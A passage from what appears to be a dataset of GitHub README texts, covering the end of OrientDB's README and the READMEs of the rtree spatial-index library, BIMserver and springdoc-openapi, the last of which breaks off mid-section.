-[SQL](https://orientdb.org/docs/3.2.x/sql/) as query language. In this way it's easy to start using it without having to learn too much new stuff.
-
-
-## Easy to install and use
-
-Yes.
OrientDB is totally written in [Java](http://en.wikipedia.org/wiki/Java_%28programming_language%29) and can run on any platform without configuration and installation.
-Do you develop with a language other than Java? No problem, look at the [Programming Language Binding](http://orientdb.org/docs/3.1.x/apis-and-drivers/).
-
-
-## Main References
-- [Documentation Version < 3.2.x](http://orientdb.org/docs/3.1.x/)
-- For any questions visit the [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions)
-
-[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/).
-
--------
-## Contributing
-
-For the guide to contributing to OrientDB check out the [CONTRIBUTING.MD](https://github.com/orientechnologies/orientdb/blob/develop/CONTRIBUTING.md)
-
-All contributions are considered licensed under the Apache 2 license unless stated otherwise.
-
--------
-
-## Licensing
-OrientDB is licensed by OrientDB LTD under the Apache 2 license. OrientDB relies on the following 3rd party libraries, which are compatible with the Apache license:
-
-- Javamail: CDDL license (http://www.oracle.com/technetwork/java/faq-135477.html)
-- java persistence 2.0: CDDL license
-- JNA: Apache 2 (https://github.com/twall/jna/blob/master/LICENSE)
-- Hibernate JPA 2.0 API: Eclipse Distribution License 1.0
-- ASM: OW2
-
-References:
-- Apache 2 license (Apache2):
-  http://www.apache.org/licenses/LICENSE-2.0.html
-
-- Common Development and Distribution License (CDDL-1.0):
-  http://opensource.org/licenses/CDDL-1.0
-
-- Eclipse Distribution License (EDL-1.0):
-  http://www.eclipse.org/org/documents/edl-v10.php (http://www.eclipse.org/org/documents/edl-v10.php)
-
-### Sponsors
-
-[![](http://s1.softpedia-static.com/_img/sp100free.png?1)](http://www.softpedia.com/get/Internet/Servers/Database-Utils/OrientDB.shtml#status)
-
--------
-
-
-### Reference
-
-Recent architecture re-factoring and improvements are described in our [BICOD
2021](http://ceur-ws.org/Vol-3163/BICOD21_paper_3.pdf) paper: - -``` -@inproceedings{DBLP:conf/bncod/0001DLT21, - author = {Daniel Ritter and - Luigi Dell'Aquila and - Andrii Lomakin and - Emanuele Tagliaferri}, - title = {OrientDB: {A} NoSQL, Open Source {MMDMS}}, - booktitle = {Proceedings of the The British International Conference on Databases - 2021, London, United Kingdom, March 28, 2022}, - series = {{CEUR} Workshop Proceedings}, - volume = {3163}, - pages = {10--19}, - publisher = {CEUR-WS.org}, - year = {2021} -} -``` - -",0 -davidmoten/rtree,Immutable in-memory R-tree and R*-tree implementations in Java with reactive api,2014-08-26T12:29:14Z,,"rtree -========= -
-[![Coverity Scan](https://scan.coverity.com/projects/4762/badge.svg?flat=1)](https://scan.coverity.com/projects/4762?tab=overview)
-[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree/badge.svg?style=flat)](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree)
-[![codecov](https://codecov.io/gh/davidmoten/rtree/branch/master/graph/badge.svg)](https://codecov.io/gh/davidmoten/rtree) - - -In-memory immutable 2D [R-tree](http://en.wikipedia.org/wiki/R-tree) implementation in java using [RxJava Observables](https://github.com/ReactiveX/RxJava) for reactive processing of search results. - -Status: *released to Maven Central* - -Note that the **next version** (without a reactive API and without serialization) is at [rtree2](https://github.com/davidmoten/rtree2). - -An [R-tree](http://en.wikipedia.org/wiki/R-tree) is a commonly used spatial index. - -This was fun to make, has an elegant concise algorithm, is thread-safe, fast, and reasonably memory efficient (uses structural sharing). - -The algorithm to achieve immutability is cute. For insertion/deletion it involves recursion down to the -required leaf node then recursion back up to replace the parent nodes up to the root. The guts of -it is in [Leaf.java](src/main/java/com/github/davidmoten/rtree/internal/LeafDefault.java) and [NonLeaf.java](src/main/java/com/github/davidmoten/rtree/internal/NonLeafDefault.java). - -[Backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) support required some complexity because effectively a -bookmark needed to be kept for a position in the tree and returned to later to continue traversal. An immutable stack containing - the node and child index of the path nodes came to the rescue here and recursion was abandoned in favour of looping to prevent stack overflow (unfortunately java doesn't support tail recursion!). - -Maven site reports are [here](http://davidmoten.github.io/rtree/index.html) including [javadoc](http://davidmoten.github.io/rtree/apidocs/index.html). 
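The path-copying scheme described above can be sketched with a toy immutable tree. This is a hand-rolled illustration (the class and names below are not the library's actual code): insertion recurses to a leaf, then rebuilds only the nodes on the root-to-leaf path, while subtrees off that path are shared by reference between the old and new trees.

```java
import java.util.ArrayList;
import java.util.List;

// Toy illustration of path-copying (structural sharing), not rtree's real code.
final class ImmutableTree {
    interface Node {}

    static final class Leaf implements Node {
        final List<Integer> values;
        Leaf(List<Integer> values) { this.values = values; }
    }

    static final class Branch implements Node {
        final Node left, right;
        Branch(Node left, Node right) { this.left = left; this.right = right; }
    }

    // Always descends left for simplicity; a real R-tree picks the child
    // whose bounding box needs the least enlargement.
    static Node insert(Node node, int value) {
        if (node instanceof Leaf) {
            List<Integer> copy = new ArrayList<>(((Leaf) node).values);
            copy.add(value);
            return new Leaf(copy);               // fresh leaf replaces the old one
        }
        Branch b = (Branch) node;
        // rebuild this branch with the new left child; right subtree is shared
        return new Branch(insert(b.left, value), b.right);
    }
}
```

Because `insert` never mutates existing nodes, a reader holding the old root keeps a consistent snapshot, which is the property that makes the tree safe for concurrent readers.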
- -Features ------------- -* immutable R-tree suitable for concurrency -* Guttman's heuristics (Quadratic splitter) ([paper](https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB8QFjAA&url=http%3A%2F%2Fpostgis.org%2Fsupport%2Frtree.pdf&ei=ieEQVJuKGdK8uATpgoKQCg&usg=AFQjCNED9w2KjgiAa9UI-UO_0eWjcADTng&sig2=rZ_dzKHBHY62BlkBuw3oCw&bvm=bv.74894050,d.c2E)) -* R*-tree heuristics ([paper](http://dbs.mathematik.uni-marburg.de/publications/myPapers/1990/BKSS90.pdf)) -* Customizable [splitter](src/main/java/com/github/davidmoten/rtree/Splitter.java) and [selector](src/main/java/com/github/davidmoten/rtree/Selector.java) -* 10x faster index creation with STR bulk loading ([paper](https://www.researchgate.net/profile/Scott_Leutenegger/publication/3686660_STR_A_Simple_and_Efficient_Algorithm_for_R-Tree_Packing/links/5563368008ae86c06b676a02.pdf)). -* search returns [```Observable```](http://reactivex.io/RxJava/javadoc/rx/Observable.html) -* search is cancelled by unsubscription -* search is ```O(log(n))``` on average -* insert, delete are ```O(n)``` worst case -* all search methods return lazy-evaluated streams offering efficiency and flexibility of functional style including functional composition and concurrency -* balanced delete -* uses structural sharing -* supports [backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) -* JMH benchmarks -* visualizer included -* serialization using [FlatBuffers](http://github.com/google/flatbuffers) -* high unit test [code coverage](http://davidmoten.github.io/rtree/cobertura/index.html) -* R*-tree performs 900,000 searches/second returning 22 entries from a tree of 38,377 Greek earthquake locations on i7-920@2.67Ghz (maxChildren=4, minChildren=1). Insert at 240,000 entries per second. 
-* requires Java 1.6 or later
-
-Number of points = 1000, max children per node 8:
-
-| Quadratic split | R*-tree split | STR bulk loaded |
-| :-------------: | :-----------: | :-----------: |
-| | | |
-
-
-Notice that there is little overlap in the R*-tree split compared to the
-Quadratic split. This should provide better search performance (and in general benchmarks show this).
-
-STR bulk loaded R-tree has a bit more overlap than R*-tree, which affects the search performance to some extent.
-
-Getting started
-----------------
-Add this maven dependency to your pom.xml:
-
-```xml
-<dependency>
- <groupId>com.github.davidmoten</groupId>
- <artifactId>rtree</artifactId>
- <version>VERSION_HERE</version>
-</dependency>
-```
-### Instantiate an R-Tree
-Use the static builder methods on the ```RTree``` class:
-
-```java
-// create an R-tree using Quadratic split with max
-// children per node 4, min children 2 (the threshold
-// at which members are redistributed)
-RTree<String, Geometry> tree = RTree.create();
-```
-You can specify a few parameters to the builder, including *minChildren*, *maxChildren*, *splitter*, *selector*:
-
-```java
-RTree<String, Geometry> tree = RTree.minChildren(3).maxChildren(6).create();
-```
-### Geometries
-The following geometries are supported for insertion in an RTree:
-
-* `Rectangle`
-* `Point`
-* `Circle`
-* `Line`
-
-### Generic typing
-If for instance you know that the entry geometry is always ```Point``` then create an ```RTree``` specifying that generic type to gain more type safety:
-
-```java
-RTree<String, Point> tree = RTree.create();
-```
-
-### R*-tree
-If you'd like an R*-tree (which uses a topological splitter on minimal margin, overlap area and area and a selector combination of minimal area increase, minimal overlap, and area):
-
-```
-RTree<String, Geometry> tree = RTree.star().maxChildren(6).create();
-```
-
-See benchmarks below for some of the performance differences.
-
-### Add items to the R-tree
-When you add an item to the R-tree you need to provide a geometry that represents the 2D physical location or
-extension of the item. 
The ``Geometries`` builder provides these factory methods:
-
-* ```Geometries.rectangle```
-* ```Geometries.circle```
-* ```Geometries.point```
-* ```Geometries.line``` (requires *jts-core* dependency)
-
-To add an item to an R-tree:
-
-```java
-RTree<String, Point> tree = RTree.create();
-tree = tree.add(item, Geometries.point(10,20));
-```
-or
-```java
-tree = tree.add(Entries.entry(item, Geometries.point(10,20)));
-```
-
-*Important note:* being an immutable data structure, calling ```tree.add(item, geometry)``` does nothing to ```tree```,
-it returns a new ```RTree``` containing the addition. Make sure you use the result of the ```add```!
-
-### Remove an item in the R-tree
-To remove an item from an R-tree, you need to match the item and its geometry:
-
-```java
-tree = tree.delete(item, Geometries.point(10,20));
-```
-or
-```java
-tree = tree.delete(entry);
-```
-
-*Important note:* being an immutable data structure, calling ```tree.delete(item, geometry)``` does nothing to ```tree```,
-it returns a new ```RTree``` without the deleted item. Make sure you use the result of the ```delete```!
-
-### Geospatial geometries (lats and longs)
-To handle wraparounds of longitude values on the earth (180/-180 boundary trickiness) there are special factory methods in the `Geometries` class. If you want to do geospatial searches then you should use these methods to build `Point`s and `Rectangle`s:
-
-```java
-Point point = Geometries.pointGeographic(lon, lat);
-Rectangle rectangle = Geometries.rectangleGeographic(lon1, lat1, lon2, lat2);
-```
-
-Under the covers these methods normalize the longitude value to be in the interval [-180, 180) and for rectangles the rightmost longitude has 360 added to it if it is less than the leftmost longitude.
-
-### Custom geometries
-You can also write your own implementation of [```Geometry```](src/main/java/com/github/davidmoten/rtree/geometry/Geometry.java). 
An implementation of ```Geometry``` needs to specify methods to:
-
-* check intersection with a rectangle (you can reuse the distance method here if you want but it might affect performance)
-* provide a minimum bounding rectangle
-* implement ```equals``` and ```hashCode``` for consistent equality checking
-* measure distance to a rectangle (0 means they intersect). Note that this method is only used for search within a distance so implementing this method is *optional*. If you don't want to implement this method just throw a ```RuntimeException```.
-
-For the R-tree to be well-behaved, the distance function if implemented needs to satisfy these properties:
-
-* ```distance(r) >= 0 for all rectangles r```
-* ```if rectangle r1 contains r2 then distance(r1)<=distance(r2)```
-* ```distance(r) = 0 if and only if the geometry intersects the rectangle r```
-
-### Searching
-The advantage of an R-tree is the ability to search for items in a region reasonably quickly.
-On average search is ```O(log(n))``` but worst case is ```O(n)```.
-
-Search methods return ```Observable``` sequences:
-```java
-Observable<Entry<String, Geometry>> results =
- tree.search(Geometries.rectangle(0,0,2,2));
-```
-or search for items within a distance from the given geometry:
-```java
-Observable<Entry<String, Geometry>> results =
- tree.search(Geometries.rectangle(0,0,2,2),5.0);
-```
-To return all entries from an R-tree:
-```java
-Observable<Entry<String, Geometry>> results = tree.entries();
-```
-
-Search with a custom geometry
-----------------------------------
-Suppose you make a custom geometry like ```Polygon``` and you want to search an ```RTree``` for points inside the polygon. This is how you do it:
-
-```java
-RTree<String, Point> tree = RTree.create();
-Func2<Point, Polygon, Boolean> pointInPolygon = ...
-Polygon polygon = ...
-...
-entries = tree.search(polygon, pointInPolygon);
-```
-The key is that you need to supply the ```intersects``` function (```pointInPolygon```) to the search. It is on you to implement that for all types of geometry present in the ```RTree```. 
This is one reason that the generic ```Geometry``` type was added in *rtree* 0.5 (so the type system could tell you what geometry types you needed to calculate intersection for).
-
-Search with a custom geometry and maxDistance
-------------------------------------------------
-As per the example above, to do a proximity search you need to specify how to calculate distance between the geometry you are searching and the entry geometries:
-
-```java
-RTree<String, Point> tree = RTree.create();
-Func2<Point, Polygon, Double> distancePointToPolygon = ...
-Polygon polygon = ...
-...
-entries = tree.search(polygon, 10, distancePointToPolygon);
-```
-Example
--------------
-```java
-import com.github.davidmoten.rtree.RTree;
-import static com.github.davidmoten.rtree.geometry.Geometries.*;
-
-RTree<String, Point> tree = RTree.maxChildren(5).create();
-tree = tree.add(""DAVE"", point(10, 20))
- .add(""FRED"", point(12, 25))
- .add(""MARY"", point(97, 125));
-
-Observable<Entry<String, Point>> entries =
- tree.search(Geometries.rectangle(8, 15, 30, 35));
-```
-
-Searching by distance on lat longs
-----------------------------------
-See [LatLongExampleTest.java](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example. The example depends on the [*grumpy-core*](https://github.com/davidmoten/grumpy) artifact which is also on Maven Central.
-
-Another lat long example searching geo circles
----------------------------------------------
-See [LatLongExampleTest.testSearchLatLongCircles()](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example of searching circles around geographic points (using great circle distance).
-
-
-What do I do with the Observable thing?
---------------------------------------
-Very useful, see [RxJava](http://github.com/ReactiveX/RxJava). 
-
-As an example, suppose you want to filter the search results then apply a function on each and reduce to some best answer:
-
-```java
-import rx.Observable;
-import rx.functions.*;
-import rx.schedulers.Schedulers;
-
-Character result =
- tree.search(Geometries.rectangle(8, 15, 30, 35))
- // filter for names alphabetically less than M
- .filter(entry -> entry.value().compareTo(""M"") < 0)
- // get the first character of the name
- .map(entry -> entry.value().charAt(0))
- // reduce to the first character alphabetically
- .reduce((x,y) -> x <= y ? x : y)
- // subscribe to the stream and block for the result
- .toBlocking().single();
-System.out.println(result);
-```
-output:
-```
-D
-```
-
-How to configure the R-tree for best performance
------------------------------------------------
-Check out the benchmarks below and refer to [other benchmark results](https://github.com/ambling/rtree-benchmark#results), but I recommend you do your own benchmarks because every data set will behave differently. If you don't want to benchmark then use the defaults. General rules based on the benchmarks:
-
-* for data sets of <10,000 entries use the default R-tree (quadratic splitter with maxChildren=4)
-* for data sets of >=10,000 entries use the star R-tree (R*-tree heuristics with maxChildren=4 by default)
-* use STR bulk loaded R-tree (quadratic splitter or R*-tree heuristics) for large (where index creation time is important) or static (where insertion and deletion are not frequent) data sets
-
-Watch out though, the benchmark data sets had quite specific characteristics. The 1000 entry dataset was randomly generated (so is more or less uniformly distributed) and the *Greek* dataset was earthquake data with its own clustering characteristics.
-
-What about memory use?
----------------------
-To minimize memory use you can use geometries that store single precision decimal values (`float`) instead of double precision (`double`). 
Here are examples:
-
-```java
-// create geometry using double precision
-Rectangle r = Geometries.rectangle(1.0, 2.0, 3.0, 4.0);
-
-// create geometry using single precision
-Rectangle r2 = Geometries.rectangle(1.0f, 2.0f, 3.0f, 4.0f);
-```
-
-The same creation methods exist for `Circle` and `Line`.
-
-How do I just get an Iterable back from a search?
--------------------------------------------------------
-If you are not familiar with the Observable API and want to skip the reactive stuff then here's how to get an ```Iterable``` from a search:
-
-```java
-Iterable<Entry<String, Point>> it = tree.search(Geometries.point(4,5))
- .toBlocking().toIterable();
-```
-
-Backpressure
---------------
-The backpressure slow path may be enabled by some RxJava operators. This may slow search performance by a factor of 3 but avoids possible out of memory errors and thread starvation due to asynchronous buffering. Backpressure is benchmarked below.
-
-Visualizer
------------
-To visualize the R-tree in a PNG file of size 600 by 600 pixels just call:
-```java
-tree.visualize(600,600)
- .save(""target/mytree.png"");
-```
-The result is like the images in the Features section above.
-
-Visualize as text
------------------
-The ```RTree.asString()``` method returns output like this:
-
-```
-mbr=Rectangle [x1=10.0, y1=4.0, x2=62.0, y2=85.0]
-  mbr=Rectangle [x1=28.0, y1=4.0, x2=34.0, y2=85.0]
-    entry=Entry [value=2, geometry=Point [x=29.0, y=4.0]]
-    entry=Entry [value=1, geometry=Point [x=28.0, y=19.0]]
-    entry=Entry [value=4, geometry=Point [x=34.0, y=85.0]]
-  mbr=Rectangle [x1=10.0, y1=45.0, x2=62.0, y2=63.0]
-    entry=Entry [value=5, geometry=Point [x=62.0, y=45.0]]
-    entry=Entry [value=3, geometry=Point [x=10.0, y=63.0]]
-```
-
-Serialization
------------------
-Release 0.8 includes [flatbuffers](https://github.com/google/flatbuffers) support as a serialization format and as a lower performance but lower memory consumption (approximately one third) option for an RTree. 
-
-The Greek earthquake data (38,377 entries) when placed in a default RTree with `maxChildren=10` takes up 4,548,133 bytes in memory. If that data is serialized then reloaded into memory using the `InternalStructure.FLATBUFFERS_SINGLE_ARRAY` option then the RTree takes up 1,431,772 bytes in memory (approximately one third the memory usage). Bear in mind though that searches are much more expensive (at the moment) with this data structure because of object creation and gc pressures (see benchmarks). Further work would be to enable direct searching of the underlying array without object creation expenses required to match the current search routines.
-
-As of 5 March 2016, indicative RTree metrics using the flatbuffers data structure are:
-
-* one third the memory use with log(N) object creations per search
-* one third the speed with backpressure (e.g. if `flatMap` or `observeOn` is downstream)
-* one tenth the speed without backpressure
-
-Note that serialization uses an optional dependency on `flatbuffers`. Add the following to your pom dependencies:
-
-```xml
-<dependency>
- <groupId>com.google.flatbuffers</groupId>
- <artifactId>flatbuffers-java</artifactId>
- <version>2.0.3</version>
- <optional>true</optional>
-</dependency>
-```
-
-## Serialization example
-
-Write an `RTree` to an `OutputStream`:
-```java
-RTree<String, Point> tree = ...;
-OutputStream os = ...;
-Serializer<String, Point> serializer =
- Serializers.flatBuffers().utf8();
-serializer.write(tree, os);
-```
-
-Read an `RTree` from an `InputStream` into a low-memory flatbuffers based structure:
-```java
-RTree<String, Point> tree =
- serializer.read(is, lengthBytes, InternalStructure.SINGLE_ARRAY);
-```
-
-Read an `RTree` from an `InputStream` into a default structure:
-```java
-RTree<String, Point> tree =
- serializer.read(is, lengthBytes, InternalStructure.DEFAULT);
-```
-
-Dependencies
---------------------
-As of 0.7.5 this library does not depend on *guava* (>2M) but rather depends on *guava-mini* (11K). 
The `nearest` search used to depend on `MinMaxPriorityQueue` from guava but now uses a backport of the Java 8 `PriorityQueue` inside a custom `BoundedPriorityQueue` class that gives about 1.7x the throughput of the guava class.
-
-How to build
----------------
-```
-git clone https://github.com/davidmoten/rtree.git
-cd rtree
-mvn clean install
-```
-
-How to run benchmarks
--------------------------
-Benchmarks are provided by
-```
-mvn clean install -Pbenchmark
-```
-Coverity scan
----------------
-This codebase is scanned by Coverity Scan whenever the branch `coverity_scan` is updated.
-
-For the project committers, if a Coverity scan is desired just do this:
-
-```bash
-git checkout coverity_scan
-git pull origin master
-git push origin coverity_scan
-```
-
-### Notes
-The *Greek* data referred to in the benchmarks is a collection of some 38,377 entries corresponding to the epicentres of earthquakes in Greece between 1964 and 2000. This data set is used by multiple studies on R-trees as a test case. 
- -### Results - -These were run on i7-920 @2.67GHz with *rtree* version 0.8-RC7: - -``` -Benchmark Mode Cnt Score Error Units - -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 262260.993 ± 2767.035 ops/s -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 296264.913 ± 2836.358 ops/s -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 135118.271 ± 1722.039 ops/s -defaultRTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 315851.452 ± 3097.496 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 278761.674 ± 4182.761 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 315254.478 ± 4104.206 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 214509.476 ± 1555.816 ops/s -defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 118094.486 ± 1118.983 ops/s -defaultRTreeSearchOf1000PointsMaxChildren004 thrpt 10 1122140.598 ± 8509.106 ops/s -defaultRTreeSearchOf1000PointsMaxChildren010 thrpt 10 569779.807 ± 4206.544 ops/s -defaultRTreeSearchOf1000PointsMaxChildren032 thrpt 10 238251.898 ± 3916.281 ops/s -defaultRTreeSearchOf1000PointsMaxChildren128 thrpt 10 702437.901 ± 5108.786 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 462243.509 ± 7076.045 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 326395.724 ± 1699.043 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 156978.822 ± 1993.372 ops/s -defaultRTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 68267.160 ± 929.236 ops/s -rStarTreeDeleteOneEveryOccurrenceFromGreekDataChildren010 thrpt 10 211881.061 ± 3246.693 ops/s -rStarTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 187062.089 ± 3005.413 ops/s -rStarTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 186767.045 ± 2291.196 ops/s -rStarTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 37940.625 ± 743.789 ops/s 
-rStarTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 151897.089 ± 674.941 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 237708.825 ± 1644.611 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 229577.905 ± 4234.760 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 78290.971 ± 393.030 ops/s -rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 6521.010 ± 50.798 ops/s -rStarTreeSearchOf1000PointsMaxChildren004 thrpt 10 1330510.951 ± 18289.410 ops/s -rStarTreeSearchOf1000PointsMaxChildren010 thrpt 10 1204347.202 ± 17403.105 ops/s -rStarTreeSearchOf1000PointsMaxChildren032 thrpt 10 576765.468 ± 8909.880 ops/s -rStarTreeSearchOf1000PointsMaxChildren128 thrpt 10 1028316.856 ± 13747.282 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 904494.751 ± 15640.005 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 649636.969 ± 16383.786 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffers thrpt 10 84230.053 ± 1869.345 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffersBackpressure thrpt 10 36420.500 ± 1572.298 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren010WithBackpressure thrpt 10 116970.445 ± 1955.659 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 224874.016 ± 14462.325 ops/s -rStarTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 358636.637 ± 4886.459 ops/s -searchNearestGreek thrpt 10 3715.020 ± 46.570 ops/s - -``` - -There is a related project [rtree-benchmark](https://github.com/ambling/rtree-benchmark) that presents a more comprehensive benchmark with results and analysis on this rtree implementation. -",0 -opensourceBIM/BIMserver,The open source BIMserver platform,2013-05-08T14:55:01Z,,"BIMserver -========= - -The Building Information Model server (short: BIMserver) enables you to store and manage the information of a construction (or other building related) project. 
Data is stored in the open data standard IFC. The BIMserver is not a fileserver, but it uses a model-driven architecture approach. This means that IFC data is stored as objects. You could see BIMserver as an IFC database, with special extra features like model checking, versioning, project structures, merging, etc. The main advantage of this approach is the ability to query, merge and filter the BIM-model and generate IFC output (i.e. files) on the fly.
-
-Thanks to its multi-user support, multiple people can work on their own part of the dataset, while the complete dataset is updated on the fly. Other users can get notifications when the model (or a part of it) is updated.
-
-BIMserver is built for developers. We've got a great wiki on https://github.com/opensourceBIM/BIMserver/wiki and are very active supporting developers on https://github.com/opensourceBIM/BIMserver/issues
-
-(C) Copyright by the contributors / BIMserver.org
-
-Licence: GNU Affero General Public License, version 3 (see http://www.gnu.org/licenses/agpl-3.0.html)
-Beware: this project makes intensive use of several other projects with different licenses. Some plugins and libraries are published under a different license. 
-",0 -springdoc/springdoc-openapi,Library for OpenAPI 3 with spring-boot,2019-07-11T23:08:20Z,,"![Octocat](https://springdoc.org/img/banner-logo.svg) -[![Build Status](https://ci-cd.springdoc.org:8443/buildStatus/icon?job=springdoc-openapi-starter-IC)](https://ci-cd.springdoc.org:8443/view/springdoc-openapi/job/springdoc-openapi-starter-IC/) -[![Quality Gate](https://sonarcloud.io/api/project_badges/measure?project=springdoc_springdoc-openapi&metric=alert_status)](https://sonarcloud.io/dashboard?id=springdoc_springdoc-openapi) -[![Known Vulnerabilities](https://snyk.io/test/github/springdoc/springdoc-openapi.git/badge.svg)](https://snyk.io/test/github/springdoc/springdoc-openapi.git) -[![Stack Exchange questions](https://img.shields.io/stackexchange/stackoverflow/t/springdoc)](https://stackoverflow.com/questions/tagged/springdoc?tab=Votes) - -IMPORTANT: ``springdoc-openapi v1.8.0`` is the latest Open Source release supporting Spring Boot 2.x and 1.x. - -An extended support for [*springdoc-openapi v1*](https://springdoc.org/v1) -project is now available for organizations that need support beyond 2023. - -For more details, feel free to reach out: [sales@springdoc.org](mailto:sales@springdoc.org) - -``springdoc-openapi`` is on [Open Collective](https://opencollective.com/springdoc). If you ❤️ this project consider becoming -a [sponsor](https://github.com/sponsors/springdoc). - -This project is sponsored by - -

-*(sponsor logos)*

-
-# Table of Contents
-
-- [Full documentation](#full-documentation)
-- [**Introduction**](#introduction)
-- [**Getting Started**](#getting-started)
- - [Library for springdoc-openapi integration with spring-boot and swagger-ui](#library-for-springdoc-openapi-integration-with-spring-boot-and-swagger-ui)
- - [Spring-boot with OpenAPI Demo applications.](#spring-boot-with-openapi-demo-applications)
- - [Source Code for Demo Applications.](#source-code-for-demo-applications)
- - [Demo Spring Boot 2 Web MVC with OpenAPI 3.](#demo-spring-boot-2-web-mvc-with-openapi-3)
- - [Demo Spring Boot 2 WebFlux with OpenAPI 3.](#demo-spring-boot-2-webflux-with-openapi-3)
- - [Demo Spring Boot 2 WebFlux with Functional endpoints OpenAPI 3.](#demo-spring-boot-2-webflux-with-functional-endpoints-openapi-3)
- - [Demo Spring Boot 2 and Spring Hateoas with OpenAPI 3.](#demo-spring-boot-2-and-spring-hateoas-with-openapi-3)
- - [Integration of the library in a Spring Boot 3.x project without the swagger-ui:](#integration-of-the-library-in-a-spring-boot-3x-project-without-the-swagger-ui)
- - [Error Handling for REST using @ControllerAdvice](#error-handling-for-rest-using-controlleradvice)
- - [Adding API Information and Security documentation](#adding-api-information-and-security-documentation)
- - [spring-webflux support with Annotated Controllers](#spring-webflux-support-with-annotated-controllers)
-- [Acknowledgements](#acknowledgements)
- - [Contributors](#contributors)
- - [Additional Support](#additional-support)
-
-# [Full documentation](https://springdoc.org/)
-
-# **Introduction**
-
-The springdoc-openapi Java library helps automate the generation of API documentation
-in Spring Boot projects.
-springdoc-openapi works by examining an application at runtime to infer API semantics
-based on Spring configurations, class structure and various annotations.
-
-The library automatically generates documentation in JSON/YAML and HTML formatted pages. 
-The generated documentation can be complemented using `swagger-api` annotations.
-
-This library supports:
-
-* OpenAPI 3
-* Spring-boot v3 (Java 17 & Jakarta EE 9)
-* JSR-303, specifically for @NotNull, @Min, @Max, and @Size.
-* Swagger-ui
-* OAuth 2
-* GraalVM native images
-
-The following video introduces the Library:
-
-* [https://youtu.be/utRxyPfFlDw](https://youtu.be/utRxyPfFlDw)
-
-For *spring-boot v3* support, make sure you use [springdoc-openapi v2](https://springdoc.org/)
-
-This is a community-based project, not maintained by the Spring Framework Contributors (Pivotal)
-
-# **Getting Started**
-
-## Library for springdoc-openapi integration with spring-boot and swagger-ui
-
-* Automatically deploys swagger-ui to a Spring Boot 3.x application
-* Documentation will be available in HTML format, using the
- official [swagger-ui jars](https://github.com/swagger-api/swagger-ui.git).
-* The Swagger UI page should then be available at http://server:port/context-path/swagger-ui.html
- and the OpenAPI description will be available at the
- following url for json format: http://server:port/context-path/v3/api-docs
- * `server`: The server name or IP
- * `port`: The server port
- * `context-path`: The context path of the application
-* Documentation can be available in yaml format as well, on the following path:
- `/v3/api-docs.yaml`
-* Add the `springdoc-openapi-starter-webmvc-ui` library to the list of your project dependencies (No
- additional configuration is needed):
-
-```xml
-<dependency>
- <groupId>org.springdoc</groupId>
- <artifactId>springdoc-openapi-starter-webmvc-ui</artifactId>
- <version>last-release-version</version>
-</dependency>
-```
-
-* This step is optional: For custom path of the swagger documentation in HTML format, add
- a custom springdoc property, in your spring-boot configuration file:
-
-```properties
-# swagger-ui custom path
-springdoc.swagger-ui.path=/swagger-ui.html
-```
-
-## Spring-boot with OpenAPI Demo applications.
-
-### [Source Code for Demo Applications](https://github.com/springdoc/springdoc-openapi-demos/tree/master). 
-
-## [Demo Spring Boot 3 Web MVC with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webmvc).
-
-## [Demo Spring Boot 3 WebFlux with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux/swagger-ui.html).
-
-## [Demo Spring Boot 3 WebFlux with Functional endpoints OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux-functional/swagger-ui.html).
-
-## [Demo Spring Boot 3 and Spring Cloud Function Web MVC](https://demos.springdoc.org/spring-cloud-function-webmvc).
-
-## [Demo Spring Boot 3 and Spring Cloud Function WebFlux](http://158.101.191.70:8085/swagger-ui.html).
-
-## [Demo Spring Boot 3 and Spring Cloud Gateway](https://demos.springdoc.org/demo-microservices/swagger-ui.html).
-
-![Branching](https://springdoc.org/img/pets.png)
-
-## Integration of the library in a Spring Boot 3.x project without the swagger-ui:
-
-* Documentation will be available at the following url for json format: http://server:port/context-path/v3/api-docs
- * `server`: The server name or IP
- * `port`: The server port
- * `context-path`: The context path of the application
-* Documentation will be available in yaml format as well, on the following
- path: `/v3/api-docs.yaml`
